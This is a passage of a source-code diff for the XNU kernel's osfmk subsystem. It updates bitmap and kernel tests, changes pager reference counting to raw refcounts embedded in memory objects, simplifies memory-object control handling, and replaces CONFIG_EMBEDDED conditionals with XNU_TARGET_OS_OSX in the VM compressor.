[thread-self port] The thread's kernel port. Used by the kernel -to receive messages from the thread. This is the port returned -by mach_thread_self. +to receive messages from the thread. This is the movable +port for the thread and different from mach_thread_self (immovable).

special_port diff --git a/osfmk/prng/entropy.c b/osfmk/prng/entropy.c index ea1ac1dfe..18a8134a3 100644 --- a/osfmk/prng/entropy.c +++ b/osfmk/prng/entropy.c @@ -37,7 +37,6 @@ #include #include #include -#include #include #include #include @@ -160,7 +159,6 @@ entropy_analysis_init(uint32_t sample_count) entropy_analysis_max_sample_count = sample_count; entropy_analysis_buffer_size = sample_count * sizeof(entropy_sample_t); entropy_analysis_buffer = zalloc_permanent(entropy_analysis_buffer_size, ZALIGN(entropy_sample_t)); - entropy_analysis_register_sysctls(); } __startup_func diff --git a/osfmk/tests/bitmap_test.c b/osfmk/tests/bitmap_test.c index 9d8d80b13..074e0a67f 100644 --- a/osfmk/tests/bitmap_test.c +++ b/osfmk/tests/bitmap_test.c @@ -32,6 +32,7 @@ #include #include #include +#include extern void dump_bitmap_next(bitmap_t *map, uint nbits); extern void dump_bitmap_lsb(bitmap_t *map, uint nbits); @@ -117,7 +118,57 @@ test_bitmap(void) assert(bitmap_first(map, nbits) == -1); assert(bitmap_lsb_first(map, nbits) == -1); + /* bitmap_not */ + bitmap_not(map, map, nbits); + assert(bitmap_is_full(map, nbits)); + + bitmap_not(map, map, nbits); + assert(bitmap_first(map, nbits) == -1); + assert(bitmap_lsb_first(map, nbits) == -1); + + /* bitmap_and */ + bitmap_t *map0 = bitmap_alloc(nbits); + assert(bitmap_first(map0, nbits) == -1); + + bitmap_t *map1 = bitmap_alloc(nbits); + bitmap_full(map1, nbits); + assert(bitmap_is_full(map1, nbits)); + + bitmap_and(map, map0, map1, nbits); + assert(bitmap_first(map, nbits) == -1); + + bitmap_and(map, map1, map1, nbits); + assert(bitmap_is_full(map, nbits)); + + /* bitmap_and_not */ + bitmap_and_not(map, map0, map1, nbits); + assert(bitmap_first(map, nbits) == -1); + + bitmap_and_not(map, map1, map0, nbits); + assert(bitmap_is_full(map, nbits)); + + /* bitmap_equal */ + for (uint i = 0; i < nbits; i++) { + bitmap_clear(map, i); + assert(!bitmap_equal(map, map1, nbits)); + bitmap_set(map, i); + assert(bitmap_equal(map, map1, 
nbits)); + } + + /* bitmap_and_not_mask_first */ + for (uint i = 0; i < nbits; i++) { + bitmap_clear(map, i); + expected_result = i; + int result = bitmap_and_not_mask_first(map1, map, nbits); + assert(result == expected_result); + bitmap_set(map, i); + result = bitmap_and_not_mask_first(map1, map, nbits); + assert(result == -1); + } + bitmap_free(map, nbits); + bitmap_free(map0, nbits); + bitmap_free(map1, nbits); } } diff --git a/osfmk/tests/kernel_tests.c b/osfmk/tests/kernel_tests.c index da46869c7..05e180390 100644 --- a/osfmk/tests/kernel_tests.c +++ b/osfmk/tests/kernel_tests.c @@ -85,6 +85,7 @@ extern kern_return_t console_serial_parallel_log_tests(void); extern kern_return_t test_os_log(void); extern kern_return_t test_os_log_parallel(void); extern kern_return_t bitmap_post_test(void); +extern kern_return_t counter_tests(void); #ifdef __arm64__ extern kern_return_t arm64_munger_test(void); @@ -138,7 +139,8 @@ struct xnupost_test kernel_post_tests[] = {XNUPOST_TEST_CONFIG_BASIC(zalloc_test #if __ARM_VFP__ XNUPOST_TEST_CONFIG_BASIC(vfp_state_test), #endif - XNUPOST_TEST_CONFIG_BASIC(vm_tests), }; + XNUPOST_TEST_CONFIG_BASIC(vm_tests), + XNUPOST_TEST_CONFIG_BASIC(counter_tests)}; uint32_t kernel_post_tests_count = sizeof(kernel_post_tests) / sizeof(xnupost_test_data_t); @@ -405,7 +407,7 @@ zalloc_test(void) ZC_DESTRUCTIBLE); T_ASSERT_NOTNULL(test_zone, NULL); - T_ASSERT_EQ_INT(test_zone->countfree, 0, NULL); + T_ASSERT_EQ_INT(test_zone->z_elems_free, 0, NULL); T_SETUPEND; T_ASSERT_NOTNULL(test_ptr = zalloc(test_zone), NULL); diff --git a/osfmk/tests/ptrauth_data_tests.c b/osfmk/tests/ptrauth_data_tests.c index a9c4c8bb5..23397bef4 100644 --- a/osfmk/tests/ptrauth_data_tests.c +++ b/osfmk/tests/ptrauth_data_tests.c @@ -85,7 +85,7 @@ ptrauth_data_tests(void) /* task_t */ ALLOC_VALIDATE_DATA_PTR(struct task, vm_map_t, map, "task.map"); - ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_self[0], "task.itk_self"); + ALLOC_VALIDATE_DATA_PTR(struct task, 
struct ipc_port *, itk_task_ports[0], "task.itk_task_ports"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_settable_self, "task.itk_settable_self"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_host, "task.itk_host"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_bootstrap, "task.itk_bootstrap"); diff --git a/osfmk/vm/Makefile b/osfmk/vm/Makefile index d9f9cc209..04aaf3450 100644 --- a/osfmk/vm/Makefile +++ b/osfmk/vm/Makefile @@ -11,6 +11,9 @@ DATAFILES = EXPORT_ONLY_FILES = \ memory_types.h \ pmap.h \ + lz4.h \ + lz4_constants.h \ + lz4_assembly_select.h \ vm_fault.h \ vm_kern.h \ vm_map.h \ diff --git a/osfmk/vm/bsd_vm.c b/osfmk/vm/bsd_vm.c index d85190a4a..871b22242 100644 --- a/osfmk/vm/bsd_vm.c +++ b/osfmk/vm/bsd_vm.c @@ -118,7 +118,11 @@ typedef struct vnode_pager { struct memory_object vn_pgr_hdr; /* pager-specific */ - struct os_refcnt ref_count; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define vn_pgr_hdr_ref vn_pgr_hdr.mo_ref +#else + os_ref_atomic_t vn_pgr_hdr_ref; +#endif struct vnode *vnode_handle; /* vnode handle */ } *vnode_pager_t; @@ -650,7 +654,7 @@ vnode_pager_reference( vnode_pager_t vnode_object; vnode_object = vnode_pager_lookup(mem_obj); - os_ref_retain(&vnode_object->ref_count); + os_ref_retain_raw(&vnode_object->vn_pgr_hdr_ref, NULL); } /* @@ -666,7 +670,7 @@ vnode_pager_deallocate( vnode_object = vnode_pager_lookup(mem_obj); - if (os_ref_release(&vnode_object->ref_count) == 0) { + if (os_ref_release_raw(&vnode_object->vn_pgr_hdr_ref, NULL) == 0) { if (vnode_object->vnode_handle != NULL) { vnode_pager_vrele(vnode_object->vnode_handle); } @@ -920,7 +924,7 @@ vnode_object_create( vnode_object->vn_pgr_hdr.mo_pager_ops = &vnode_pager_ops; vnode_object->vn_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; - os_ref_init(&vnode_object->ref_count, NULL); + os_ref_init_raw(&vnode_object->vn_pgr_hdr_ref, NULL); vnode_object->vnode_handle = vp; return vnode_object; diff --git a/osfmk/vm/device_vm.c 
b/osfmk/vm/device_vm.c index 76e537501..d5bbfecea 100644 --- a/osfmk/vm/device_vm.c +++ b/osfmk/vm/device_vm.c @@ -93,13 +93,23 @@ typedef struct device_pager { /* pager-specific data */ lck_mtx_t lock; - struct os_refcnt ref_count; /* reference count */ device_port_t device_handle; /* device_handle */ vm_size_t size; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define dev_pgr_hdr_ref dev_pgr_hdr.mo_ref +#else + os_ref_atomic_t dev_pgr_hdr_ref; +#endif int flags; boolean_t is_mapped; } *device_pager_t; +__header_always_inline os_ref_count_t +device_pager_get_refcount(device_pager_t device_object) +{ + return os_ref_get_count_raw(&device_object->dev_pgr_hdr_ref); +} + LCK_GRP_DECLARE(device_pager_lck_grp, "device_pager"); ZONE_DECLARE(device_pager_zone, "device node pager structures", @@ -229,7 +239,7 @@ device_pager_lookup( assert(mem_obj->mo_pager_ops == &device_pager_ops); device_object = (device_pager_t)mem_obj; - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); return device_object; } @@ -357,10 +367,10 @@ device_pager_reference( device_pager_t device_object; device_object = device_pager_lookup(mem_obj); - os_ref_retain(&device_object->ref_count); + os_ref_retain_raw(&device_object->dev_pgr_hdr_ref, NULL); DTRACE_VM2(device_pager_reference, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); } /* @@ -372,14 +382,15 @@ device_pager_deallocate( { device_pager_t device_object; memory_object_control_t device_control; + os_ref_count_t ref_count; device_object = device_pager_lookup(mem_obj); DTRACE_VM2(device_pager_deallocate, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); - os_ref_count_t ref_count = os_ref_release(&device_object->ref_count); + ref_count = os_ref_release_raw(&device_object->dev_pgr_hdr_ref, 
NULL); if (ref_count == 1) { /* @@ -389,7 +400,7 @@ device_pager_deallocate( DTRACE_VM2(device_pager_destroy, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); assert(device_object->is_mapped == FALSE); if (device_object->device_handle != (device_port_t) NULL) { @@ -404,8 +415,14 @@ device_pager_deallocate( */ DTRACE_VM2(device_pager_free, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); + device_control = device_object->dev_pgr_hdr.mo_control; + + if (device_control != MEMORY_OBJECT_CONTROL_NULL) { + memory_object_control_deallocate(device_control); + device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; + } device_pager_lock_destroy(device_object); zfree(device_pager_zone, device_object); @@ -469,7 +486,7 @@ device_pager_map( device_object = device_pager_lookup(mem_obj); device_pager_lock(device_object); - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); if (device_object->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -494,7 +511,7 @@ device_pager_last_unmap( device_object = device_pager_lookup(mem_obj); device_pager_lock(device_object); - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); if (device_object->is_mapped) { device_object->is_mapped = FALSE; drop_ref = TRUE; @@ -532,12 +549,12 @@ device_object_create(void) device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; device_pager_lock_init(device_object); - os_ref_init(&device_object->ref_count, NULL); + os_ref_init_raw(&device_object->dev_pgr_hdr_ref, NULL); device_object->is_mapped = FALSE; DTRACE_VM2(device_pager_create, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + 
unsigned int, device_pager_get_refcount(device_object)); return device_object; } diff --git a/osfmk/vm/lz4.h b/osfmk/vm/lz4.h index 512efd04b..d2b80278c 100644 --- a/osfmk/vm/lz4.h +++ b/osfmk/vm/lz4.h @@ -34,7 +34,11 @@ #include "lz4_assembly_select.h" #include "lz4_constants.h" +#if CONFIG_IO_COMPRESSION_STATS +#include +#else #define memcpy __builtin_memcpy +#endif #pragma mark - Building blocks diff --git a/osfmk/vm/memory_object.c b/osfmk/vm/memory_object.c index 7fa63cc7a..a952e0d69 100644 --- a/osfmk/vm/memory_object.c +++ b/osfmk/vm/memory_object.c @@ -1462,16 +1462,7 @@ memory_object_iopl_request( vm_object_reference(object); named_entry_unlock(named_entry); } else if (ip_kotype(port) == IKOT_MEM_OBJ_CONTROL) { - memory_object_control_t control; - control = (memory_object_control_t) port; - if (control == NULL) { - return KERN_INVALID_ARGUMENT; - } - object = memory_object_control_to_vm_object(control); - if (object == VM_OBJECT_NULL) { - return KERN_INVALID_ARGUMENT; - } - vm_object_reference(object); + panic("unexpected IKOT_MEM_OBJ_CONTROL: %p", port); } else { return KERN_INVALID_ARGUMENT; } @@ -1638,8 +1629,6 @@ host_default_memory_manager( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - new_manager = *default_manager; lck_mtx_lock(&memory_manager_default_lock); current_manager = memory_manager_default; @@ -2006,43 +1995,26 @@ memory_object_is_shared_cache( return object->object_is_shared_cache; } -static ZONE_DECLARE(mem_obj_control_zone, "mem_obj_control", - sizeof(struct memory_object_control), ZC_NOENCRYPT); - __private_extern__ memory_object_control_t memory_object_control_allocate( vm_object_t object) { - memory_object_control_t control; - - control = (memory_object_control_t)zalloc(mem_obj_control_zone); - if (control != MEMORY_OBJECT_CONTROL_NULL) { - control->moc_object = object; - control->moc_ikot = IKOT_MEM_OBJ_CONTROL; /* fake ip_kotype */ - } - return control; + return object; } __private_extern__ void 
memory_object_control_collapse( - memory_object_control_t control, + memory_object_control_t *control, vm_object_t object) { - assert((control->moc_object != VM_OBJECT_NULL) && - (control->moc_object != object)); - control->moc_object = object; + *control = object; } __private_extern__ vm_object_t memory_object_control_to_vm_object( memory_object_control_t control) { - if (control == MEMORY_OBJECT_CONTROL_NULL || - control->moc_ikot != IKOT_MEM_OBJ_CONTROL) { - return VM_OBJECT_NULL; - } - - return control->moc_object; + return control; } __private_extern__ vm_object_t @@ -2090,17 +2062,16 @@ memory_object_control_reference( */ void memory_object_control_deallocate( - memory_object_control_t control) + __unused memory_object_control_t control) { - zfree(mem_obj_control_zone, control); } void memory_object_control_disable( - memory_object_control_t control) + memory_object_control_t *control) { - assert(control->moc_object != VM_OBJECT_NULL); - control->moc_object = VM_OBJECT_NULL; + assert(*control != VM_OBJECT_NULL); + *control = VM_OBJECT_NULL; } void diff --git a/osfmk/vm/memory_object.h b/osfmk/vm/memory_object.h index 930a66023..cb57eb469 100644 --- a/osfmk/vm/memory_object.h +++ b/osfmk/vm/memory_object.h @@ -80,7 +80,7 @@ memory_object_control_t memory_object_control_allocate( __private_extern__ void memory_object_control_collapse( - memory_object_control_t control, + memory_object_control_t *control, vm_object_t object); __private_extern__ @@ -95,7 +95,7 @@ mach_port_t convert_mo_control_to_port( memory_object_control_t control); extern void memory_object_control_disable( - memory_object_control_t control); + memory_object_control_t *control); extern memory_object_control_t convert_port_to_mo_control( diff --git a/osfmk/vm/pmap.h b/osfmk/vm/pmap.h index 63fee92d7..d396d8f51 100644 --- a/osfmk/vm/pmap.h +++ b/osfmk/vm/pmap.h @@ -138,6 +138,9 @@ extern void *pmap_steal_memory(vm_size_t size); /* Early memory allocation */ extern void 
*pmap_steal_freeable_memory(vm_size_t size); /* Early memory allocation */ extern uint_t pmap_free_pages(void); /* report remaining unused physical pages */ +#if defined(__arm__) || defined(__arm64__) +extern uint_t pmap_free_pages_span(void); /* report phys address range of unused physical pages */ +#endif /* defined(__arm__) || defined(__arm64__) */ extern void pmap_startup(vm_offset_t *startp, vm_offset_t *endp); /* allocate vm_page structs */ @@ -902,6 +905,9 @@ extern bool pmap_is_trust_cache_loaded(const uuid_t uuid); extern uint32_t pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]); extern bool pmap_lookup_in_loaded_trust_caches(const uint8_t cdhash[CS_CDHASH_LEN]); +extern void pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]); +extern bool pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]); + extern bool pmap_in_ppl(void); extern void *pmap_claim_reserved_ppl_page(void); @@ -911,6 +917,8 @@ extern void pmap_ledger_alloc_init(size_t); extern ledger_t pmap_ledger_alloc(void); extern void pmap_ledger_free(ledger_t); +extern bool pmap_is_bad_ram(ppnum_t ppn); +extern void pmap_retire_page(ppnum_t ppn); extern kern_return_t pmap_cs_allow_invalid(pmap_t pmap); #if __arm64__ diff --git a/osfmk/vm/vm_apple_protect.c b/osfmk/vm/vm_apple_protect.c index 17b667c2c..f7fcaceb3 100644 --- a/osfmk/vm/vm_apple_protect.c +++ b/osfmk/vm/vm_apple_protect.c @@ -59,7 +59,6 @@ #include #include - /* * APPLE PROTECT MEMORY PAGER * @@ -150,13 +149,18 @@ const struct memory_object_pager_ops apple_protect_pager_ops = { */ typedef struct apple_protect_pager { /* mandatory generic header */ - struct memory_object ap_pgr_hdr; + struct memory_object ap_pgr_hdr; /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - struct os_refcnt ref_count; /* reference count */ - boolean_t is_ready; /* is this pager ready ? */ - boolean_t is_mapped; /* is this mem_obj mapped ? 
*/ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define ap_pgr_hdr_ref ap_pgr_hdr.mo_ref +#else + os_ref_atomic_t ap_pgr_hdr_ref; /* reference count */ +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this mem_obj mapped ? */ + bool is_cached; /* is this pager cached ? */ vm_object_t backing_object; /* VM obj w/ encrypted data */ vm_object_offset_t backing_offset; vm_object_offset_t crypto_backing_offset; /* for key... */ @@ -170,8 +174,8 @@ typedef struct apple_protect_pager { * List of memory objects managed by this EMM. * The list is protected by the "apple_protect_pager_lock" lock. */ -int apple_protect_pager_count = 0; /* number of pagers */ -int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */ +unsigned int apple_protect_pager_count = 0; /* number of pagers */ +unsigned int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */ queue_head_t apple_protect_pager_queue = QUEUE_HEAD_INITIALIZER(apple_protect_pager_queue); LCK_GRP_DECLARE(apple_protect_pager_lck_grp, "apple_protect"); LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp); @@ -179,15 +183,15 @@ LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp); /* * Maximum number of unmapped pagers we're willing to keep around. */ -int apple_protect_pager_cache_limit = 20; +unsigned int apple_protect_pager_cache_limit = 20; /* * Statistics & counters. 
*/ -int apple_protect_pager_count_max = 0; -int apple_protect_pager_count_unmapped_max = 0; -int apple_protect_pager_num_trim_max = 0; -int apple_protect_pager_num_trim_total = 0; +unsigned int apple_protect_pager_count_max = 0; +unsigned int apple_protect_pager_count_unmapped_max = 0; +unsigned int apple_protect_pager_num_trim_max = 0; +unsigned int apple_protect_pager_num_trim_total = 0; @@ -198,7 +202,8 @@ apple_protect_pager_t apple_protect_pager_create( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end); + vm_object_offset_t crypto_end, + boolean_t cache_pager); apple_protect_pager_t apple_protect_pager_lookup(memory_object_t mem_obj); void apple_protect_pager_dequeue(apple_protect_pager_t pager); void apple_protect_pager_deallocate_internal(apple_protect_pager_t pager, @@ -375,7 +380,7 @@ apple_protect_pager_data_request( pager = apple_protect_pager_lookup(mem_obj); assert(pager->is_ready); - assert(os_ref_get_count(&pager->ref_count) > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("apple_protect_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -402,7 +407,7 @@ apple_protect_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); /* @@ -743,7 +748,7 @@ apple_protect_pager_reference( pager = apple_protect_pager_lookup(mem_obj); lck_mtx_lock(&apple_protect_pager_lock); - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); lck_mtx_unlock(&apple_protect_pager_lock); } @@ -824,7 +829,8 @@ apple_protect_pager_deallocate_internal( boolean_t locked) { boolean_t needs_trimming; - int count_unmapped; + unsigned int count_unmapped; + 
os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&apple_protect_pager_lock); @@ -840,7 +846,7 @@ apple_protect_pager_deallocate_internal( } /* drop a reference on this pager */ - os_ref_count_t ref_count = os_ref_release_locked(&pager->ref_count); + ref_count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL); if (ref_count == 1) { /* @@ -943,7 +949,7 @@ apple_protect_pager_map( lck_mtx_lock(&apple_protect_pager_lock); assert(pager->is_ready); - assert(os_ref_get_count(&pager->ref_count) > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -951,7 +957,7 @@ apple_protect_pager_map( * are removed. */ pager->is_mapped = TRUE; - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); apple_protect_pager_count_mapped++; } lck_mtx_unlock(&apple_protect_pager_lock); @@ -969,7 +975,7 @@ apple_protect_pager_last_unmap( memory_object_t mem_obj) { apple_protect_pager_t pager; - int count_unmapped; + unsigned int count_unmapped; PAGER_DEBUG(PAGER_ALL, ("apple_protect_pager_last_unmap: %p\n", mem_obj)); @@ -1029,7 +1035,7 @@ apple_protect_pager_lookup( assert(mem_obj->mo_pager_ops == &apple_protect_pager_ops); pager = (apple_protect_pager_t)(uintptr_t) mem_obj; - assert(os_ref_get_count(&pager->ref_count) > 0); + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); return pager; } @@ -1040,7 +1046,8 @@ apple_protect_pager_create( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end) + vm_object_offset_t crypto_end, + boolean_t cache_pager) { apple_protect_pager_t pager, pager2; memory_object_control_t control; @@ -1064,8 +1071,16 @@ apple_protect_pager_create( pager->ap_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->is_ready = FALSE;/* not ready until it has a "name" */ - 
os_ref_init_count(&pager->ref_count, NULL, 2); /* existence reference (for the cache) and another for the caller */ + /* one reference for the caller */ + os_ref_init_count_raw(&pager->ap_pgr_hdr_ref, NULL, 1); pager->is_mapped = FALSE; + if (cache_pager) { + /* extra reference for the cache */ + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); + pager->is_cached = true; + } else { + pager->is_cached = false; + } pager->backing_object = backing_object; pager->backing_offset = backing_offset; pager->crypto_backing_offset = crypto_backing_offset; @@ -1208,7 +1223,8 @@ apple_protect_pager_setup( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end) + vm_object_offset_t crypto_end, + boolean_t cache_pager) { apple_protect_pager_t pager; struct pager_crypt_info *old_crypt_info, *new_crypt_info; @@ -1295,7 +1311,7 @@ apple_protect_pager_setup( crypt_info_deallocate(old_crypt_info); assert(old_crypt_info->crypt_refcnt > 0); /* give extra reference on pager to the caller */ - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); break; } } @@ -1335,7 +1351,8 @@ apple_protect_pager_setup( crypto_backing_offset, new_crypt_info, crypto_start, - crypto_end); + crypto_end, + cache_pager); } if (pager == APPLE_PROTECT_PAGER_NULL) { /* could not create a new pager */ @@ -1386,8 +1403,8 @@ apple_protect_pager_trim(void) { apple_protect_pager_t pager, prev_pager; queue_head_t trim_queue; - int num_trim; - int count_unmapped; + unsigned int num_trim; + unsigned int count_unmapped; lck_mtx_lock(&apple_protect_pager_lock); @@ -1407,7 +1424,8 @@ apple_protect_pager_trim(void) prev_pager = (apple_protect_pager_t) queue_prev(&pager->pager_queue); - if (os_ref_get_count(&pager->ref_count) == 2 && + if (pager->is_cached && + os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) == 2 && pager->is_ready && !pager->is_mapped) { /* this pager can be trimmed */ 
@@ -1441,6 +1459,8 @@ apple_protect_pager_trim(void) pager, apple_protect_pager_t, pager_queue); + assert(pager->is_cached); + pager->is_cached = false; pager->pager_queue.next = NULL; pager->pager_queue.prev = NULL; /* @@ -1448,7 +1468,8 @@ apple_protect_pager_trim(void) * has already been dequeued, but we still need to remove * a reference. */ - os_ref_count_t __assert_only count = os_ref_release_locked(&pager->ref_count); + os_ref_count_t __assert_only count; + count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL); assert(count == 1); apple_protect_pager_terminate_internal(pager); } diff --git a/osfmk/vm/vm_compressor.c b/osfmk/vm/vm_compressor.c index 92a53eb22..315c8b429 100644 --- a/osfmk/vm/vm_compressor.c +++ b/osfmk/vm/vm_compressor.c @@ -118,7 +118,7 @@ boolean_t validate_c_segs = TRUE; * the boot-arg & device-tree code. */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #if CONFIG_FREEZE int vm_compressor_mode = VM_PAGER_FREEZER_DEFAULT; @@ -127,10 +127,10 @@ struct freezer_context freezer_context_global; int vm_compressor_mode = VM_PAGER_NOT_CONFIGURED; #endif /* CONFIG_FREEZE */ -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ int vm_compressor_mode = VM_PAGER_COMPRESSOR_WITH_SWAP; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ TUNABLE(uint32_t, vm_compression_limit, "vm_compression_limit", 0); int vm_compressor_is_active = 0; @@ -344,9 +344,9 @@ static void vm_compressor_do_delayed_compactions(boolean_t); static void vm_compressor_compact_and_swap(boolean_t); static void vm_compressor_age_swapped_in_segments(boolean_t); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static void vm_compressor_take_paging_space_action(void); -#endif +#endif /* XNU_TARGET_OS_OSX */ void compute_swapout_target_age(void); @@ -481,7 +481,7 @@ vm_wants_task_throttled(task_t task) TUNABLE(bool, kill_on_no_paging_space, "-kill_on_no_paging_space", false); #endif /* DEVELOPMENT || DEBUG */ -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static 
uint32_t no_paging_space_action_in_progress = 0; extern void memorystatus_send_low_swap_note(void); @@ -510,7 +510,7 @@ vm_compressor_take_paging_space_action(void) } } } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ void @@ -623,12 +623,12 @@ vm_compressor_init(void) assert((C_SEGMENTS_PER_PAGE * sizeof(union c_segu)) == PAGE_SIZE); -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX vm_compressor_minorcompact_threshold_divisor = 20; vm_compressor_majorcompact_threshold_divisor = 30; vm_compressor_unthrottle_threshold_divisor = 40; vm_compressor_catchup_threshold_divisor = 60; -#else +#else /* !XNU_TARGET_OS_OSX */ if (max_mem <= (3ULL * 1024ULL * 1024ULL * 1024ULL)) { vm_compressor_minorcompact_threshold_divisor = 11; vm_compressor_majorcompact_threshold_divisor = 13; @@ -640,7 +640,7 @@ vm_compressor_init(void) vm_compressor_unthrottle_threshold_divisor = 35; vm_compressor_catchup_threshold_divisor = 50; } -#endif +#endif /* !XNU_TARGET_OS_OSX */ queue_init(&c_bad_list_head); queue_init(&c_age_list_head); @@ -663,7 +663,7 @@ vm_compressor_init(void) compressor_pool_max_size = C_SEG_MAX_LIMIT; compressor_pool_max_size *= C_SEG_BUFSIZE; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_compression_limit == 0) { if (max_mem <= (4ULL * 1024ULL * 1024ULL * 1024ULL)) { @@ -1309,14 +1309,14 @@ c_seg_switch_state(c_segment_t c_seg, int new_state, boolean_t insert_head) { int old_state = c_seg->c_state; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX #if DEVELOPMENT || DEBUG if (new_state != C_IS_FILLING) { LCK_MTX_ASSERT(&c_seg->c_lock, LCK_MTX_ASSERT_OWNED); } LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED); #endif -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ switch (old_state) { case C_IS_EMPTY: assert(new_state == C_IS_FILLING || new_state == C_IS_FREE); @@ -2195,6 +2195,13 @@ compressor_needs_to_swap(void) goto check_if_low_space; } } + +#if (XNU_TARGET_OS_OSX && __arm64__) + /* + * Thrashing detection disabled. 
+ */ +#else /* (XNU_TARGET_OS_OSX && __arm64__) */ + compute_swapout_target_age(); if (swapout_target_age) { @@ -2219,6 +2226,7 @@ compressor_needs_to_swap(void) if (swapout_target_age) { should_swap = TRUE; } +#endif /* (XNU_TARGET_OS_OSX && __arm64__) */ check_if_low_space: @@ -2504,9 +2512,9 @@ vm_compressor_do_delayed_compactions(boolean_t flush_all) VM_DEBUG_CONSTANT_EVENT(vm_compressor_do_delayed_compactions, VM_COMPRESSOR_DO_DELAYED_COMPACTIONS, DBG_FUNC_START, c_minor_count, flush_all, 0, 0); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED); -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ while (!queue_empty(&c_minor_list_head) && needs_to_swap == FALSE) { c_seg = (c_segment_t)queue_first(&c_minor_list_head); @@ -3286,11 +3294,11 @@ c_seg_allocate(c_segment_t *current_chead) int min_needed; int size_to_populate; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_compressor_low_on_space()) { vm_compressor_take_paging_space_action(); } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ if ((c_seg = *current_chead) == NULL) { uint32_t c_segno; @@ -4465,11 +4473,11 @@ done: vm_swap_consider_defragmenting(VM_SWAP_FLAGS_NONE); } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if ((c_minor_count && COMPRESSOR_NEEDS_TO_MINOR_COMPACT()) || vm_compressor_needs_to_major_compact()) { vm_wake_compactor_swapper(); } -#endif +#endif /* !XNU_TARGET_OS_OSX */ return retval; } diff --git a/osfmk/vm/vm_compressor.h 